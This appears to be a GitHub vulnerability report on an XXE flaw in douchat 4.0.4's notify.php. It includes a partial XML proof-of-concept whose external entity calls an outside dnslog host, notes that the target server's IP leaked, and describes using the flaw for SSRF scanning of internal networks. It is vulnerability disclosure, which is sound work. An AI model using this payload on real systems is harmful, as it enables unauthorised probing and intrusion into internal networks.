Join GitHub today
GitHub is home to over 28 million developers working together to host and review code, manage projects, and build software together.
Vulnerability code is located
douchat-4.0.4\Data\notify.php 10 line.
Simplexml_load_string function can parse XML,thus forming an XXE vulnerability
Build a POC：
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://3dy5gu.ceye.io/xxe_test">
Used dnslog here
POST of POC
Dnslog has received the display
The covered place is the real IP address of the target server.
XXE is accompanied by an SSRF vulnerability for intranet detection.For intranet detection, simply change the address to the intranet IP and port. If it is enabled, it will be displayed.
Press h to open a hovercard with more details.